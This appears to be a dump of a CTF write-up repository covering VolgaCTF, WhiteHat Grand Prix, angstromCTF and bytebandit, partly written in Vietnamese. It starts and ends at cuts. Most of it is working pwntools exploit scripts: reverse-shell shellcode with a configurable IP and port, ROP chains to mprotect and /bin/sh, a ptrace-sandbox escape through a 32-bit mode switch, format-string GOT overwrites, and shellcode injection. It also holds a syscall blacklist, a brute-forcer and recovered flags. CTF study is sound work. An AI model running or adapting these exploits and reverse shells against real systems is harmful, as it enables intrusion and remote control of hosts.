x_10*86*182*x_24+x_32*2*x_30-4*x_39-x_39+10*x_32+8*x_17-8*x_30+4*x_34-12*x_29-x_12*55*x_41+123*97*1144*x_17==1381453791, 9*103+-5*x_34+6*125-11*x_21-14*97-8*67+x_39*1344*97*x_21+5*x_40+15*111-x_27*15*x_26-10*x_13+11*x_16+8*x_17-x_17==1411741755, 13*x_33+x_20+4*(84-x_20)+8*125-125-x_13*90*x_36+6*x_20-4*x_37-x_37+x_11*x_32*20*70-4*x_9-x_9+2*x_29-10*86+x_23*156*x_11==5981100, -7*x_19+7*x_14+13*84+x_42+x_23*4*x_17-2*x_40-13*x_17+9*x_14+14*111-67*39*x_13+6*x_32+4*x_29-x_37+14*x_24==-262868, x_10+x_9*10*x_14+8*125-3*x_13-70*90*x_26-6*x_27+11*111+6*x_27+2*x_24+x_27-x_29-8*x_33-x_33+6*111-13*x_11==-563008, -7*x_24+-11*x_27+-11*x_9+x_12+x_38*70*x_30-10*x_29-2*x_40-6*x_28-x_43*8*84+10*x_25-2*x_12-103*x_43*((x_40*(2**8))-32*x_40)==-267345737, -11*84+13*x_29+13*x_28+x_29+-7*x_20+5*x_16+15*x_10+4*x_41+2*x_17-15*x_18-10*x_30-6*x_24+13*86-48*x_43*x_18-2*70==-586617, 2*x_12+103*225*86-12*x_36-7*103-x_43*12*70-12*x_43-86-97*18*x_29-x_11*x_21*75*108+12*x_12+15*x_25==-31526095) -------------------------------------------------------------------------------- /2018/VolgaCTF/lights/README.md: -------------------------------------------------------------------------------- 1 | Check time delay, you has morse code. 2 | See [lights.idb](/2018/VolgaCTF/lights/lights.idb) -------------------------------------------------------------------------------- /2018/VolgaCTF/lights/lights.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/VolgaCTF/lights/lights.idb -------------------------------------------------------------------------------- /2018/VolgaCTF/xor_trick/MeePwn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/VolgaCTF/xor_trick/MeePwn.png -------------------------------------------------------------------------------- /2018/VolgaCTF/xor_trick/xor_trick.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | # IPADDR = "\xa7\x58\x72\xd9" # 167.88.114.217 6 | IPADDR = "\x7f\x00\x00\x01" # 127.0.0.1 7 | PORT = "\x7a\x69" # 31337 8 | shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"+PORT+"\xc7\x44\x24\x04"+IPADDR+"\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" 9 | # http://shell-storm.org/shellcode/files/shellcode-857.php 10 | # Shellcode Author : Russell Willis 11 | 12 | def generate_payload(payload): 13 | result = "" 14 | payload += "\x90"*(0x10-(len(payload)%0x10)) 15 | for i in xrange(0,len(payload),0x10): 16 | a = u64(payload[i:i+8]) 17 | b = u64(payload[i+8:i+16]) 18 | c = (b*(2**64))+a 19 | d = c ^ 0xc5145c1e4210842ac5145c1e4210842a 20 | # pwndbg> x/2gx 0x7ffff0706c45 21 | # 0x7ffff0706c45 : 0xc5145c1e4210842a 0xc5145c1e4210842a 22 | result += p64(d&0xffffffffffffffff) 23 | result += p64(d>>64) 24 | result = p64(len(result))+result 25 | return result 26 | 27 | if sys.argv[1]=="1": 28 | HOST = '127.0.0.1' 29 | PORT = 45678 30 | else: 31 | HOST = 'xortrick.quals.2018.volgactf.ru' 32 | PORT = 45678 33 | 34 | call_rsp = 0x000000000043781c # Python 3.5.2 3ca82c498bdce94a835bdb0dfd3c644f 35 | 36 | r = remote(HOST,PORT) 37 | filename = "MeePwn.png" # use tweakpng change size 1x1 38 | img = open(filename,"rb").read() 39 | im_file_data = p64(len(img)) 40 | im_file_data += img 41 | r.send(im_file_data) 42 | 43 | payload = p64(call_rsp)*0xa # overwrite return address 44 | payload += shellcode 45 | data1 = generate_payload(payload) 46 | r.send(data1) 47 | 48 | r.interactive() 49 | # VolgaCTF{M@ke_pyth0n_explo1table_ag@in} -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/README.md: -------------------------------------------------------------------------------- 1 | # pwn01 2 | ``` 3 | nc pwn01.grandprix.whitehatvn.com 26129 4 | file: material.grandprix.whitehatvn.com/pwn01 5 | ``` 6 | ## Dịch ngược và tìm lỗi 7 | 8 | Bài cho ta khá nhiều file: 9 | 1. giftshop 10 | 2. ptrace_64 11 | 3. ptrace_64.cpp 12 | 4. blacklist.conf 13 | 5. run.sh 14 | 6. menu.txt 15 | 16 | Đọc run.sh ta thấy chương trình chạy dưới binary ptrace_64 17 | ``` 18 | ./ptrace_64 ./giftshop gift 1 60 50 blacklist.conf 19 | ``` 20 | Đọc source ptrace_64.cpp ta thấy chương trình load vào các tham số: 21 | * ./giftshop: đường dẫn tới binary sẽ thực thi 22 | * gift: binary giftshop sẽ chạy dưới quyền của username gift 23 | * 1: global_cpu_time_limit 24 | * 60: global_real_time_limit 25 | * 50: memLimit 26 | * blacklist.conf: đường dẫn tới file blacklist các syscall. 27 | 28 | Nội dung file blacklist.conf: 29 | ``` 30 | 7 31 | 56 32 | 57 33 | 58 34 | 59 35 | 62 36 | 200 37 | 234 38 | 1 39 | /home/gift/flag.txt 40 | ``` 41 | 42 | Hiểu nôm na là ptrace_64 sẽ chạy **giftshop** với quyền của user **gift** và trace các syscall để chặn các syscall trong file **blacklist.conf**, ngoài ra ptrace_64 còn chặn sys_open, sys_openat với đường dẫn /home/gift/flag.txt. 43 | 44 | Dò bảng [syscall cho x86_64](http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) ta thấy các syscall bị chặn bao gồm: 45 | * 7: sys_poll 46 | * 56: sys_clone 47 | * 57: sys_fork 48 | * 58: sys_vfork 49 | * 59: sys_execve 50 | * 62: sys_kill 51 | * 200: sys_tkill 52 | * 234: sys_tgkill 53 | * 1: sys_write 54 | 55 | ### Phân tích file giftshop: 56 | checksec ta thấy chương trình có các cờ NX enabled, PIE enabled. 57 | Coi sơ chương trình qua IDA ta dễ dàng nhận thấy chương trình không có hàm _stack_chk_fail và phát hiện lỗi **bufferoverflow** qua hàm ReadStr tại offset 0x1FEC. 58 | ```c 59 | __int64 __fastcall readStr(const char *buff, int size) 60 | { 61 | size_t len; // rdx 62 | __int64 result; // rax 63 | 64 | __isoc99_scanf("%s", buff); 65 | buff[strlen(buff)] = 0; 66 | len = strlen(buff); 67 | result = size; 68 | if ( len > size ) 69 | Quit(); 70 | return result; 71 | } 72 | ``` 73 | Ta có thể bypass check bằng cách nhập null byte để strlen(buff) <= size. 74 | 75 | Hàm main gọi hàm readInt (offset 0x2052) để chọn menu ta thấy hàm sử dụng hàm ReadStr với buff nằm tại stack nên ta có thể thực thi stackoverflow tại đây (do không có _stack_chk_fail) 76 | ```c 77 | __int64 readInt() 78 | { 79 | char nptr; // [rsp+0h] [rbp-10h] 80 | int v2; // [rsp+Ch] [rbp-4h] 81 | 82 | readStr(&nptr, 4); 83 | v2 = atoi(&nptr); 84 | if ( v2 <= 0 || v2 > 256 ) 85 | Quit(); 86 | return v2; 87 | } 88 | ``` 89 | 90 | ## Ý tưởng và giải quyết 91 | Ta thực hiện ghi shellcode vào RECVNAME (offset 0x203120) trên BSS. 92 | Sau đó ta stackoverflow để ROP về mprotect nhằm tạo quyền cho vùng nhớ BSS có quyền read, write và execute sau đó nhảy về thực thi shellcode trên đó. 93 | 94 | Mục tiêu tiếp theo là viết shellcode làm sao để bypass được ptrace, ta có 1 số ý tưởng: 95 | 1. Sử dụng sys_symlink để bypass sys_open nhưng ý tưởng này thất bại vì ptrace_64.cpp sử dụng hàm realpath để kiểm tra đường dẫn thực sự của file sẽ open. 96 | 2. Sử dụng stub_execveat: có thể thành công vì syscall này không nằm trong danh sách blacklist syscall. 97 | 3. Switch mode sang x86, sau khi switch sẽ bypass được các syscall number bị chặn nhằm thực thi sys_execve("/bin/sh") 98 | 99 | ### Tiến hành thực hiện theo ý tưởng thứ 3: 100 | 101 | Ta thấy các vùng nhớ được cấp phát đều lớn hơn 4 bytes (32 bits) nên ta cần mmap 1 vùng nhớ nhỏ hơn 4 bytes để setup cho các thanh ghi esp và eip của chương trình sau khi thực hiện switch. 102 | Ta thực hiện *mmap(0x40000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)* rồi read shellcode vào đó sau đó thực hiện retf với esp+0x4 là 0x23 (x86) để switch mode và nhảy về vùng chứa shellcode. 103 | 104 | ### Payload exploit 105 | [giftshop.py](https://github.com/phieulang1993/ctf-writeups/blob/master/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop.py) -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/blacklist.conf: -------------------------------------------------------------------------------- 1 | 7 2 | 56 3 | 57 4 | 58 5 | 59 6 | 62 7 | 200 8 | 234 9 | 1 10 | /home/gift/flag.txt 11 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/flag.txt: -------------------------------------------------------------------------------- 1 | flag{concavang} 2 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/giftshop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def giftshop(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./giftshop") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | r = process(['./ptrace_64', '/home/phieulang/2018/whitehatgrandprix/forPlayer/giftshop','gift', '1', '60', '50', 'blacklist.conf']) 11 | raw_input("debug?") 12 | elif DEBUG=="3": 13 | HOST = 'pwn01.grandprix.whitehatvn.com' 14 | PORT = 26129 15 | r = remote(HOST,PORT) 16 | 17 | def pause(): 18 | time.sleep(0.05) 19 | 20 | context.arch = "amd64" 21 | r.recvuntil('OK First, here is a giftcard, it may help you in next time you come here !\n') 22 | base = eval(r.recvline())-0x2030D8 23 | log.info("base: %#x" %base) 24 | r.recvuntil('Can you give me your name plzz ??\n') 25 | r.sendline('\x00') 26 | pause() 27 | r.recvline("Enter the receiver's name plzz: \n") 28 | payload = "\x00"*(0x1e0-0x120) 29 | payload += asm(shellcraft.amd64.linux.read(fd=0, buffer=base+0x2031E0, count=0x500)) 30 | # payload += "\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05" 31 | r.sendline(payload) 32 | pause() 33 | r.recvuntil('Your choice:\n') 34 | 35 | payload = "10" 36 | payload = payload.ljust(0x10, "\x00") 37 | payload += p64(base+0x203e00) # rbp 38 | payload += p64(base+0x225F) # pop rdi; ret 39 | payload += p64(base+0x203000) # rdi 40 | payload += p64(base+0x2261) # pop rsi; ret 41 | payload += p64(0x1000) 42 | payload += p64(base+0x2265) # pop rdx; ret 43 | payload += p64(7) 44 | payload += p64(base+0x2254) # syscall;ret 45 | payload += p64(base+0x2031E0) # shellcode 46 | payload += p64(base+0xB40) 47 | r.sendline(payload) 48 | pause() 49 | 50 | shellcode = '' 51 | shellcode += asm(shellcraft.amd64.linux.syscall('SYS_mmap', 0x40000, 0x2000, 0x7, 0x22, -1, 0)) 52 | shellcode += asm(shellcraft.amd64.linux.read(fd=0, buffer=0x40000, count=0x500)) 53 | shellcode += asm(""" 54 | xor rsp, rsp 55 | mov esp, 0x40500 56 | mov DWORD PTR [esp+4], 0x23 57 | mov DWORD PTR [esp], 0x40000 58 | retf 59 | """) 60 | payload = "\x90"*0x25 61 | payload += shellcode 62 | r.sendline(payload) 63 | pause() 64 | payload = "6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80".decode("hex") # shellcraft.i386.linux.sh() 65 | pause() 66 | r.sendline(payload) 67 | 68 | r.interactive() 69 | 70 | giftshop(sys.argv[1]) 71 | # WhiteHat{aeb7656b7a397a01c0d9d19fba3a81352e9b21aa} -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/ptrace_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/ptrace_64 -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/giftshop_pwn01/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ "$EUID" -ne 0 ] 3 | then echo "Please run as root" 4 | exit 5 | fi 6 | # cd /home/gift 7 | ./ptrace_64 /home/phieulang/2018/whitehatgrandprix/forPlayer/giftshop phieulang 1 60 50 blacklist.conf 8 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/README.md: -------------------------------------------------------------------------------- 1 | # RE06 2 | ``` 3 | material.grandprix.whitehatvn.com/re06 4 | Note: If you find flag in format WhiteHat{abcdef}, you should submit in form WhiteHat{sha1(abcdef)} 5 | ``` 6 | ## Dịch ngược 7 | Chương trình code bằng .NET nên ta sử dụng [Dnspy](https://github.com/0xd4d/dnSpy/) để decompile 8 | 9 | Coi sơ ta thấy một số hàm chính: 10 | ```csharp 11 | private void btn_check_Click(object sender, RoutedEventArgs e) 12 | { 13 | string text = this.tb_key.Text; 14 | string a = MainWindow.Enc(text, 9157, 41117); 15 | bool flag = a == "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ="; 16 | if (flag) 17 | { 18 | MessageBox.Show("Correct!! You found FLAG"); 19 | } 20 | else 21 | { 22 | MessageBox.Show("Try again!"); 23 | } 24 | } 25 | 26 | public static string Enc(string s, int e, int n) 27 | { 28 | int[] array = new int[s.Length]; 29 | for (int i = 0; i < s.Length; i++) 30 | { 31 | array[i] = (int)s[i]; 32 | } 33 | int[] array2 = new int[array.Length]; 34 | for (int i = 0; i < array.Length; i++) 35 | { 36 | array2[i] = MainWindow.mod(array[i], e, n); 37 | } 38 | string text = ""; 39 | for (int i = 0; i < array.Length; i++) 40 | { 41 | text += (char)array2[i]; 42 | } 43 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 44 | } 45 | 46 | public static int mod(int m, int e, int n) 47 | { 48 | int[] array = new int[100]; 49 | int num = 0; 50 | do 51 | { 52 | array[num] = e % 2; 53 | num++; 54 | e /= 2; 55 | } 56 | while (e != 0); 57 | int num2 = 1; 58 | for (int i = num - 1; i >= 0; i--) 59 | { 60 | num2 = num2 * num2 % n; 61 | bool flag = array[i] == 1; 62 | if (flag) 63 | { 64 | num2 = num2 * m % n; 65 | } 66 | } 67 | return num2; 68 | } 69 | ``` 70 | 71 | Ta thấy code khá đơn giản, đưa input vào rồi qua hàm xử lí từng kí tự xong ghép lại rồi encode base64 và check với key. 72 | 73 | ## Giải quyết 74 | Có thể ngồi reverse thuật toán rồi viết thuật toán decrypt cái đống base64 sau khi decode nhưng mà bài easy như này mình phải tiết kiệm thời gian cho các bài khó hơn nên mình quyết định bruteforce rồi quăng máy để giải bài khác. 75 | 76 | ### Code bruteforce 77 | ```csharp 78 | using System; 79 | using System.Collections.Generic; 80 | using System.Linq; 81 | using System.Text; 82 | using System.Threading.Tasks; 83 | 84 | namespace RE06 85 | { 86 | class Program 87 | { 88 | public static int mod(int m, int e, int n) 89 | { 90 | int[] array = new int[100]; 91 | int num = 0; 92 | do 93 | { 94 | array[num] = e % 2; 95 | num++; 96 | e /= 2; 97 | } 98 | while (e != 0); 99 | int num2 = 1; 100 | for (int i = num - 1; i >= 0; i--) 101 | { 102 | num2 = num2 * num2 % n; 103 | bool flag = array[i] == 1; 104 | if (flag) 105 | { 106 | num2 = num2 * m % n; 107 | } 108 | } 109 | return num2; 110 | } 111 | public static string Enc(string s, int e, int n) 112 | { 113 | int[] array = new int[s.Length]; 114 | for (int i = 0; i < s.Length; i++) 115 | { 116 | array[i] = (int)s[i]; 117 | } 118 | int[] array2 = new int[array.Length]; 119 | for (int i = 0; i < array.Length; i++) 120 | { 121 | array2[i] = mod(array[i], e, n); 122 | } 123 | string text = ""; 124 | for (int i = 0; i < array.Length; i++) 125 | { 126 | text += (char)array2[i]; 127 | } 128 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 129 | } 130 | public static string check() 131 | { 132 | string encoded; 133 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 134 | string flag = ""; 135 | bool found; 136 | while (true) 137 | { 138 | found = false; 139 | for (int i = 32; i < 128; i++) 140 | { 141 | for (int i2 = 32; i2 < 128; i2++) 142 | { 143 | for (int i3 = 32; i3 < 128; i3++) 144 | { 145 | encoded = Enc(flag + (char)i + (char)i2 + (char)i3, 9157, 41117).Replace("=", ""); 146 | if (encoded == key) 147 | { 148 | flag = flag + (char)i + (char)i2 + (char)i3; 149 | Console.WriteLine("Flag: {0}", flag); 150 | return flag; 151 | } 152 | if (encoded == key.Substring(0, encoded.Length)) 153 | { 154 | flag = flag + (char)i + (char)i2 + (char)i3; 155 | Console.WriteLine("Flag: {0}", flag); 156 | found = true; 157 | break; 158 | } 159 | } 160 | } 161 | if (found) 162 | { 163 | break; 164 | } 165 | } 166 | } 167 | } 168 | static void Main(string[] args) 169 | { 170 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 171 | string encoded; 172 | string flag = check(); 173 | while (true) 174 | { 175 | for (int i = 32; i < 128; i++) 176 | { 177 | encoded = Enc(flag + (char)i, 9157, 41117); 178 | if (encoded == key + "LGQ=") 179 | { 180 | flag = flag + (char)i; 181 | Console.WriteLine("Final Flag: {0}", flag); 182 | Console.ReadLine(); 183 | } 184 | } 185 | Console.WriteLine("Not found!"); 186 | break; 187 | 188 | } 189 | 190 | } 191 | } 192 | } 193 | ``` 194 | ### Kết quả: 195 | ![alt text](https://raw.githubusercontent.com/phieulang1993/ctf-writeups/master/2018/WhiteHatGrandPrix2018quals/re06/result.png "Kết quả") 196 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/re06.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace RE06 8 | { 9 | class Program 10 | { 11 | public static int mod(int m, int e, int n) 12 | { 13 | int[] array = new int[100]; 14 | int num = 0; 15 | do 16 | { 17 | array[num] = e % 2; 18 | num++; 19 | e /= 2; 20 | } 21 | while (e != 0); 22 | int num2 = 1; 23 | for (int i = num - 1; i >= 0; i--) 24 | { 25 | num2 = num2 * num2 % n; 26 | bool flag = array[i] == 1; 27 | if (flag) 28 | { 29 | num2 = num2 * m % n; 30 | } 31 | } 32 | return num2; 33 | } 34 | public static string Enc(string s, int e, int n) 35 | { 36 | int[] array = new int[s.Length]; 37 | for (int i = 0; i < s.Length; i++) 38 | { 39 | array[i] = (int)s[i]; 40 | } 41 | int[] array2 = new int[array.Length]; 42 | for (int i = 0; i < array.Length; i++) 43 | { 44 | array2[i] = mod(array[i], e, n); 45 | } 46 | string text = ""; 47 | for (int i = 0; i < array.Length; i++) 48 | { 49 | text += (char)array2[i]; 50 | } 51 | return Convert.ToBase64String(Encoding.Unicode.GetBytes(text)); 52 | } 53 | public static string check() 54 | { 55 | string encoded; 56 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 57 | string flag = ""; 58 | bool found; 59 | while (true) 60 | { 61 | found = false; 62 | for (int i = 32; i < 128; i++) 63 | { 64 | for (int i2 = 32; i2 < 128; i2++) 65 | { 66 | for (int i3 = 32; i3 < 128; i3++) 67 | { 68 | encoded = Enc(flag + (char)i + (char)i2 + (char)i3, 9157, 41117).Replace("=", ""); 69 | if (encoded == key) 70 | { 71 | flag = flag + (char)i + (char)i2 + (char)i3; 72 | Console.WriteLine("Flag: {0}", flag); 73 | return flag; 74 | } 75 | if (encoded == key.Substring(0, encoded.Length)) 76 | { 77 | flag = flag + (char)i + (char)i2 + (char)i3; 78 | Console.WriteLine("Flag: {0}", flag); 79 | found = true; 80 | break; 81 | } 82 | } 83 | } 84 | if (found) 85 | { 86 | break; 87 | } 88 | } 89 | } 90 | } 91 | static void Main(string[] args) 92 | { 93 | string key = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAlj"; 94 | string encoded; 95 | string flag = check(); 96 | while (true) 97 | { 98 | for (int i = 32; i < 128; i++) 99 | { 100 | encoded = Enc(flag + (char)i, 9157, 41117); 101 | if (encoded == key + "LGQ=") 102 | { 103 | flag = flag + (char)i; 104 | Console.WriteLine("Final Flag: {0}", flag); 105 | Console.ReadLine(); 106 | } 107 | } 108 | Console.WriteLine("Not found!"); 109 | break; 110 | 111 | } 112 | 113 | } 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/re06/result.png -------------------------------------------------------------------------------- /2018/WhiteHatGrandPrix2018quals/re06/reverse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/WhiteHatGrandPrix2018quals/re06/reverse.exe -------------------------------------------------------------------------------- /2018/angstromCTF/hellcode/hellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/angstromCTF/hellcode/hellcode -------------------------------------------------------------------------------- /2018/angstromCTF/hellcode/hellcode.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | def hellcode(DEBUG): 5 | code_runner = 0x400996 6 | offset_mprotect = 0x0000000000101770 7 | offset_system = 0x0000000000045390 8 | offset_str_bin_sh = 0x18cd57 9 | 10 | if DEBUG=="1": 11 | t = 0.005 12 | r = process("./hellcode") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXX') 16 | r = s.process('/problems/hellcode/hellcode') 17 | 18 | def a(s): 19 | return asm(s, arch = "amd64", os = 'linux') 20 | 21 | def stage1(): 22 | # save r14 = mprotect+7 23 | # r15 = code_runner 24 | # return code_runner 25 | log.info('stage 1') 26 | r.recvuntil("Please enter your code: ") 27 | payload = a('pop rbx') 28 | payload += a('sub bx, %d' % (0x400B47 - code_runner)) # 0x400996 (code_runner) 29 | payload += a('push rcx') 30 | payload += a('pop r14') # r14 = mprotect+7 31 | payload += a('push rbx') 32 | payload += a('push rbx') 33 | payload += a('pop r15') # r15 = 0x400996 (code_runner) 34 | payload += "\x90"*(0x10-len(payload)) 35 | r.send(payload) 36 | 37 | def stage2(): 38 | # change r14 from mprotect+7 to system 39 | # r13 = system 40 | # return code_runner 41 | log.info('stage 2') 42 | r.recvuntil("Please enter your code: ") 43 | payload = a('pop rax') # trash 44 | payload += a('push r15') # code_runner 45 | payload += a('sub r14, %d' % (offset_mprotect+7 - offset_system)) # r14 = system 46 | payload += a('push r14') 47 | payload += a('pop r13') # r13 = system 48 | payload += "\x90"*(0x10-len(payload)) 49 | r.send(payload) 50 | 51 | def stage3(): 52 | # change r13 to /bin/sh 53 | # return system (r14) 54 | log.info('stage 3') 55 | r.recvuntil("Please enter your code: ") 56 | payload = '' 57 | payload += a('add r13, %d' % (offset_str_bin_sh - offset_system)) # r13 = /bin/sh 58 | payload += a('push r13') 59 | payload += a('pop rdi') # rdi = /bin/sh 60 | payload += a('push r14') # system 61 | payload += "\x90"*(0x10-len(payload)) 62 | r.send(payload) 63 | 64 | def leak(): 65 | puts_plt = 0x4007A0 66 | libc_start_main_got = 0x602048 67 | r.recvuntil("Please enter your code: ") 68 | payload = a('pop rbx') 69 | payload += a('sub bx, 0xd9') 70 | payload += a('push rbx') 71 | payload += a('mov rdi, 0x602048') 72 | payload += "\x90"*(0x10-len(payload)) 73 | r.send(payload) 74 | res = r.recv(6) 75 | print hex(u64(res.ljust(8,"\x00"))) # same local 76 | 77 | 78 | stage1() 79 | stage2() 80 | stage3() 81 | # leak() 82 | 83 | r.interactive() 84 | 85 | hellcode(sys.argv[1]) 86 | -------------------------------------------------------------------------------- /2018/angstromCTF/letter/letter.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def personal_letter32(DEBUG): 6 | 7 | if DEBUG=="1": 8 | t = 0.005 9 | r = process("./personal_letter32") 10 | raw_input("debug?") 11 | elif DEBUG=="2": 12 | s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXXXX') 13 | s.set_working_directory('/problems/letter') 14 | r = s.process('./personal_letter32') 15 | printFlag = 0x0804872B 16 | exit_got = 0x804A030 17 | offset = 26 18 | r.recvuntil("Enter Name (100 Chars max): ") 19 | payload = p32(exit_got) 20 | payload += "%"+str((printFlag&0xffff)-12)+"u"+"%26$hn" 21 | r.sendline(payload) 22 | 23 | r.interactive() 24 | 25 | personal_letter32(sys.argv[1]) 26 | # Here's a flag: actf{flags_are_fun} -------------------------------------------------------------------------------- /2018/angstromCTF/letter/personal_letter32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/angstromCTF/letter/personal_letter32 -------------------------------------------------------------------------------- /2018/bytebandit/ROP_Crazy/gg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/ROP_Crazy/gg -------------------------------------------------------------------------------- /2018/bytebandit/ROP_Crazy/ropcrazy.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def gg(DEBUG): 6 | context.arch = "amd64" 7 | t = 0.3 8 | 9 | def a(s): 10 | return asm(s, arch = "amd64", os = "linux") 11 | 12 | if DEBUG=="1": 13 | t = 0.005 14 | r = process("./gg") 15 | raw_input("debug?") 16 | elif DEBUG=="2": 17 | HOST = '34.218.199.37' 18 | PORT = 5000 19 | r = remote(HOST,PORT) 20 | 21 | shellcode = a(shellcraft.amd64.linux.sh()) 22 | res = r.recv(len("0x7ffff7ff6000")) 23 | r.recv(0x1000) 24 | shelladdr = int(res,16) 25 | log.info('shell: %#x' % shelladdr) 26 | payload = p64(shelladdr) 27 | r.send(payload) 28 | payload_readmore = a("""pop rax 29 | sub rax, 0x15 30 | push rax 31 | push rax 32 | pop rdx 33 | """) 34 | payload_readmore = payload_readmore.ljust(8,"\x90") 35 | r.send(payload_readmore) 36 | 37 | r.sendline(shellcode) # 0x400837 call _read 38 | r.interactive() 39 | 40 | gg(sys.argv[1]) 41 | """ 42 | id 43 | uid=1000(pwn) gid=1000(pwn) groups=1000(pwn) 44 | $ ls 45 | flag.txt 46 | gg 47 | $ cat f* 48 | flag{woah_those_must_have_been_some_good_rets} 49 | $ 50 | """ -------------------------------------------------------------------------------- /2018/bytebandit/twisted/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/twisted/libc.so.6 -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def twisted(DEBUG): 6 | t = 0.3 7 | offset_system = 0x3a940 8 | offset_sh = 0x15902b 9 | offset_printf = 0x49020 10 | HOST = '34.218.199.37' 11 | PORT = 6000 12 | r1 = process("./twisted_patched", env={"LD_PRELOAD":"./libc.so.6"}) 13 | r2 = remote(HOST,PORT) 14 | 15 | 16 | for i in xrange(312): 17 | question1 = r1.recvuntil("\n").split("=")[0] 18 | question2 = r2.recvuntil("\n").split("=")[0] 19 | if question1!=question2: 20 | print 